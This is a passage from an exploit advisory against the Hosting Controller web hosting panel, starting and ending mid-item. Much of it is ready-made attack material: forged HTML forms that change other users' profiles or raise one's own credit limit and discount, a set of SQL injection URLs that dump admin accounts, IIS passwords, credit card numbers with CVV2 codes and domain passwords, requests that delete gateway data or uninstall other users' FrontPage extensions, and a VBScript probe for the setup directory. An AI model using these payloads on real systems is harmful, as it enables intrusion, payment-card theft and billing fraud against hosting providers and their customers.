&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;_action&nbsp;=&nbsp;'/Hosting/Addreseller.asp?loginname=ResAdmin'
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;frmChangeProfile.action&nbsp;=&nbsp;window.document.all.URL.value&nbsp;+&nbsp;_action
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;true;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/script&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;URL:&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;URL&quot;&nbsp;/&gt;&lt;br&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;form&nbsp;name=&quot;frmChangeProfile&quot;&nbsp;action=&quot;&quot;&nbsp;method=&quot;post&quot;&nbsp;onsubmit=&quot;return&nbsp;check()&quot;&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;UserName:&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;loginname&quot;&nbsp;value=&quot;Victim&nbsp;User&quot;&nbsp;/&gt;&nbsp;&lt;br&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;first&nbsp;name:&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;first_name&quot;&nbsp;value=&quot;&quot;&nbsp;/&gt;&nbsp;&lt;br&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;last&nbsp;name:&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;last_name&quot;&nbsp;value=&quot;&quot;&nbsp;/&gt;&nbsp;&lt;br&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;description:&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;description&quot;&nbsp;value=&quot;&quot;&nbsp;/&gt;&nbsp;&lt;br&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;company:&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;company&quot;&nbsp;value=&quot;&quot;&nbsp;/&gt;&nbsp;&lt;br&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;email:&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;email&quot;&nbsp;value=&quot;User's&nbsp;Actual&nbsp;Email&nbsp;Address&quot;&nbsp;/&gt;&nbsp;&lt;br&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;country:&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;country&quot;&nbsp;value=&quot;&quot;&nbsp;/&gt;&nbsp;&lt;br&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;state:&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;state&quot;&nbsp;value=&quot;&quot;&nbsp;/&gt;&nbsp;&lt;br&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;city:&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;city&quot;&nbsp;value=&quot;&quot;&nbsp;/&gt;&nbsp;&lt;br&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;address:&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;address&quot;&nbsp;value=&quot;&quot;&nbsp;/&gt;&nbsp;&lt;br&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;phone:&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;phone&quot;&nbsp;value=&quot;&quot;&nbsp;/&gt;&nbsp;&lt;br&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;fax:&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;fax&quot;&nbsp;value=&quot;&quot;&nbsp;/&gt;&nbsp;&lt;br&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;zip:&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;zip&quot;&nbsp;value=&quot;&quot;&nbsp;/&gt;&nbsp;&lt;br&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;input&nbsp;type=&quot;submit&quot;&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/form&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Note:&nbsp;&quot;ResAdmin&quot;&nbsp;in&nbsp;&quot;_action&quot;&nbsp;can&nbsp;change&nbsp;to&nbsp;&quot;hcadmin&quot;&nbsp;or&nbsp;an&nbsp;another&nbsp;valid&nbsp;username.
&nbsp;&nbsp;&nbsp;&nbsp;4.2-&nbsp;Now&nbsp;Goto:&nbsp;http://[HC&nbsp;URL]/hosting/xml_addresellerresult.asp
&nbsp;&nbsp;&nbsp;&nbsp;4.3-&nbsp;A&nbsp;user&nbsp;can&nbsp;inject&nbsp;a&nbsp;SQL&nbsp;query&nbsp;in&nbsp;&quot;Email&quot;&nbsp;or&nbsp;&quot;Loginname&quot;&nbsp;field&nbsp;to&nbsp;change&nbsp;user's&nbsp;profile&nbsp;without&nbsp;having&nbsp;his&nbsp;email&nbsp;address&nbsp;too.

\\\\\\\\\\\\\\\\\\\\\
/////////////////////

5-&nbsp;[User]&nbsp;can&nbsp;see&nbsp;all&nbsp;the&nbsp;database&nbsp;information&nbsp;by&nbsp;a&nbsp;SQL&nbsp;injection.
&nbsp;5.1-&nbsp;Some&nbsp;exploits&nbsp;are:
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;~~~~~~~~~~~~~~~~5.1.1&nbsp;Exploits~~~~~~~~~~~~~~~~~~~~~~~~
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;---See&nbsp;all&nbsp;users
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;http://[HC&nbsp;URL]/accounts/accountmanager.asp?iconwebsite=&amp;search=1&amp;sortaction=1&amp;sortfield=name&nbsp;union&nbsp;select&nbsp;Name,FullName,Description,AdminLevel&nbsp;From&nbsp;Admin_List&nbsp;where&nbsp;1=1&nbsp;order&nbsp;by&nbsp;name
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;---AdminProp
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;http://[HC&nbsp;URL]/accounts/accountmanager.asp?iconwebsite=&amp;search=1&amp;sortaction=1&amp;sortfield=name&nbsp;union&nbsp;select&nbsp;propname,adminname,propvalue,propname&nbsp;From&nbsp;Adminprop&nbsp;where&nbsp;1=1&nbsp;order&nbsp;by&nbsp;name
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;---SQL&nbsp;SERVER
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;http://[HC&nbsp;URL]/accounts/accountmanager.asp?iconwebsite=&amp;search=1&amp;sortaction=1&amp;sortfield=name&nbsp;union&nbsp;select&nbsp;Databasename,Owner,Loginname,Servername&nbsp;From&nbsp;SQLServer&nbsp;where&nbsp;1=1&nbsp;order&nbsp;by&nbsp;name
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;---IISPasswords
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;http://[HC&nbsp;URL]/accounts/accountmanager.asp?iconwebsite=&amp;search=1&amp;sortaction=1&amp;sortfield=name&nbsp;union&nbsp;select&nbsp;FolderID,WebsiteID,User,Folder&nbsp;From&nbsp;IISPasswords&nbsp;where&nbsp;1=1&nbsp;order&nbsp;by&nbsp;name
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;---CreditCards
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;http://[HC&nbsp;URL]/accounts/accountmanager.asp?iconwebsite=&amp;search=1&amp;sortaction=1&amp;sortfield=name&nbsp;union&nbsp;select&nbsp;creditcardno,expdate,isEncrypted,cvv2&nbsp;From&nbsp;creditcard&nbsp;where&nbsp;1=1&nbsp;order&nbsp;by&nbsp;name
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;---DSN
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;http://[HC&nbsp;URL]/accounts/accountmanager.asp?iconwebsite=&amp;search=1&amp;sortaction=1&amp;sortfield=name&nbsp;union&nbsp;select&nbsp;DSNName,DSNOwner,FilePath,Driver&nbsp;From&nbsp;DSN&nbsp;where&nbsp;1=1&nbsp;order&nbsp;by&nbsp;name
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;---Domain&nbsp;Registration
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;http://[HC&nbsp;URL]/accounts/accountmanager.asp?iconwebsite=&amp;search=1&amp;sortaction=1&amp;sortfield=name&nbsp;union&nbsp;select&nbsp;domainname,domainpassword,ns1,ns1_IP&nbsp;From&nbsp;DomainRegistration&nbsp;where&nbsp;1=1&nbsp;order&nbsp;by&nbsp;name
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;---Domai&nbsp;nRegistration&nbsp;Info
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;http://[HC&nbsp;URL]/accounts/accountmanager.asp?iconwebsite=&amp;search=1&amp;sortaction=1&amp;sortfield=name&nbsp;union&nbsp;select&nbsp;custname,accountlogin,accountpass,authoritytype&nbsp;&gt;From&nbsp;DomainRegistrationInfo&nbsp;where&nbsp;1=1&nbsp;order&nbsp;by&nbsp;name
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;---GateWays
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;http://[HC&nbsp;URL]/accounts/accountmanager.asp?iconwebsite=&amp;search=1&amp;sortaction=1&amp;sortfield=name&nbsp;union&nbsp;select&nbsp;creditcardno,CVV2,Amount,expdate&nbsp;From&nbsp;GateWays&nbsp;where&nbsp;1=1&nbsp;order&nbsp;by&nbsp;name
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

\\\\\\\\\\\\\\\\\\\\\
/////////////////////

6-&nbsp;[User]&nbsp;can&nbsp;change&nbsp;his&nbsp;credit&nbsp;amount&nbsp;or&nbsp;increase&nbsp;his&nbsp;discount.
&nbsp;&nbsp;&nbsp;&nbsp;6.1-&nbsp;User&nbsp;can&nbsp;increase&nbsp;his&nbsp;credit&nbsp;or&nbsp;discount&nbsp;by&nbsp;&quot;ChangeCredit.htm&quot;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;~~~~~~~~~~~~~~~~6.1.1&nbsp;ChangeCredit.htm~~~~~~~~~~~~~~~~~~~~~~~~
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;script&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;function&nbsp;check(){
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;_action&nbsp;=&nbsp;'/Accounts/AccountActions.asp?ActionType=UpdateUser'
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;frmChangePass.action&nbsp;=&nbsp;window.document.all.URL.value&nbsp;+&nbsp;_action
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;true;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/script&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;URL:&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;URL&quot;&nbsp;/&gt;&lt;br&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;form&nbsp;name=&quot;frmChangePass&quot;&nbsp;action=&quot;&quot;&nbsp;method=&quot;post&quot;&nbsp;onsubmit=&quot;return&nbsp;check()&quot;&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;UserName:&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;UserName&quot;&nbsp;value=&quot;[USERNAME]&quot;&nbsp;/&gt;&nbsp;&lt;br&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;FullName:&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;FullName&quot;&nbsp;value=&quot;[USERNAME]&quot;&nbsp;/&gt;&nbsp;&lt;br&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Description:&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;Description&quot;&nbsp;value=&quot;Something&quot;&nbsp;/&gt;&nbsp;&lt;br&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;DefaultDiscount:&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;DefaultDiscount&quot;&nbsp;value=&quot;100&quot;&nbsp;/&gt;&nbsp;&lt;br&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;CreditLimit:&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;CreditLimit&quot;&nbsp;value=&quot;9999&quot;&nbsp;/&gt;&nbsp;&lt;br&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;input&nbsp;type=&quot;hidden&quot;&nbsp;name=&quot;ActionType&quot;&nbsp;value=&quot;AddUser&quot;&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;input&nbsp;type=&quot;hidden&quot;&nbsp;name=&quot;PassCheck&quot;&nbsp;value=&quot;False&quot;&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;input&nbsp;type=&quot;submit&quot;&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/form&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

\\\\\\\\\\\\\\\\\\\\\
/////////////////////

7-&nbsp;[User]&nbsp;can&nbsp;uninstall&nbsp;other's&nbsp;FrontPage&nbsp;extensions.
&nbsp;7.1-&nbsp;A&nbsp;user&nbsp;can&nbsp;uninstall&nbsp;other's&nbsp;FrontPage&nbsp;extensions&nbsp;by&nbsp;sending&nbsp;server&nbsp;&quot;host&quot;&nbsp;id&nbsp;(IIS)&nbsp;value&nbsp;to&nbsp;&quot;http://[HC&nbsp;URL]/fp2002/UNINSTAL.asp&quot;&nbsp;by&nbsp;POST&nbsp;method.

\\\\\\\\\\\\\\\\\\\\\
/////////////////////

8-&nbsp;[User]&nbsp;can&nbsp;delete&nbsp;all&nbsp;of&nbsp;gateway&nbsp;information.
&nbsp;8.1-&nbsp;By&nbsp;using&nbsp;&quot;http://[HC&nbsp;URL]/OpenApi/GatewayVariables.asp&quot;&nbsp;directly.
&nbsp;8.2-&nbsp;Also&nbsp;by&nbsp;a&nbsp;SQL&nbsp;Injection&nbsp;in&nbsp;&quot;http://[HC&nbsp;URL]/OpenApi/GatewayVariables.asp?GateWayID=1&nbsp;or&nbsp;1=1&nbsp;or&nbsp;1=1&quot;.

\\\\\\\\\\\\\\\\\\\\\
/////////////////////

9-&nbsp;[User]&nbsp;can&nbsp;enable&nbsp;or&nbsp;disable&nbsp;pay&nbsp;type.
&nbsp;9.1-&nbsp;By&nbsp;using&nbsp;&quot;http://[HC&nbsp;URL]/adminsettings/choosetranstype.asp&quot;&nbsp;directly.

\\\\\\\\\\\\\\\\\\\\\
/////////////////////

10-&nbsp;[[User]&nbsp;can&nbsp;see&nbsp;all&nbsp;usernames&nbsp;in&nbsp;the&nbsp;server&nbsp;by&nbsp;&quot;fp2000/NEWSRVR.asp&quot;.
&nbsp;10.1-&nbsp;Some&nbsp;exploits&nbsp;are:
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;http://[HC&nbsp;URL]/fp2000/NEWSRVR.asp?AdminName=OWNERNAME&amp;AdminLevel=reseller
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;http://[HC&nbsp;URL]/fp2000/NEWSRVR.asp?AdminName=hcadmin&amp;AdminLevel=host
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;And&nbsp;for&nbsp;all&nbsp;usernames:&nbsp;http://[HC&nbsp;URL]/fp2000/NEWSRVR.asp?AdminName=&amp;AdminLevel=

\\\\\\\\\\\\\\\\\\\\\
/////////////////////

11-&nbsp;[User]&nbsp;can&nbsp;find&nbsp;Hosting&nbsp;Controller&nbsp;setup&nbsp;directory.
&nbsp;11.1-&nbsp;This&nbsp;exploit&nbsp;run&nbsp;locally&nbsp;so&nbsp;the&nbsp;url&nbsp;is&nbsp;like:&nbsp;&quot;http://localhost:8077/hosting/css.asp?AutoHost=resadmin'&quot;
&nbsp;11.2-&nbsp;To&nbsp;see&nbsp;it&nbsp;locally&nbsp;you&nbsp;can&nbsp;use&nbsp;&quot;FindMap.asp&quot;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;~~~~~~~~~~~~~~~~11.2.1&nbsp;FindMap.asp~~~~~~~~~~~~~~~~~~~~~~~~
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;%@LANGUAGE=&quot;VBSCRIPT&quot;&nbsp;CODEPAGE=&quot;1252&quot;%&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;%
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Check&nbsp;=&nbsp;1&nbsp;'&nbsp;Change&nbsp;to&nbsp;1,2,3,4&nbsp;if&nbsp;you&nbsp;can't&nbsp;get&nbsp;the&nbsp;proper&nbsp;answer

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;If&nbsp;Check&nbsp;=1&nbsp;then
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'-------------------------------------------------------------------------
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Set&nbsp;xml&nbsp;=&nbsp;Server.CreateObject(&quot;Microsoft.XMLHTTP&quot;)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;xml.Open&nbsp;&quot;Get&quot;,&nbsp;&quot;http://127.0.0.1:8077/hosting/css.asp?AutoHost=resadmin'&quot;,&nbsp;False
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'-------------------------------------------------------------------------
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ElseIf&nbsp;Check&nbsp;=2&nbsp;Then
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'-------------------------------------------------------------------------
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Set&nbsp;xml&nbsp;=&nbsp;Server.CreateObject(&quot;Microsoft.XMLHTTP&quot;)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;xml.Open&nbsp;&quot;Get&quot;,&nbsp;&quot;http://localhost:8077/hosting/css.asp?AutoHost=resadmin'&quot;,&nbsp;False
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'-------------------------------------------------------------------------
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ElseIf&nbsp;Check&nbsp;=3&nbsp;Then
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'-------------------------------------------------------------------------
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Set&nbsp;xml&nbsp;=&nbsp;Server.CreateObject(&quot;MSXML2.XMLHTTP&quot;)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;xml.Open&nbsp;&quot;Get&quot;,&nbsp;&quot;http://127.0.0.1:8077/hosting/css.asp?AutoHost=resadmin'&quot;,&nbsp;False
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'-------------------------------------------------------------------------
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ElseIf&nbsp;Check&nbsp;=4&nbsp;Then
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'-------------------------------------------------------------------------
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Set&nbsp;xml&nbsp;=&nbsp;Server.CreateObject(&quot;MSXML2.XMLHTTP&quot;)
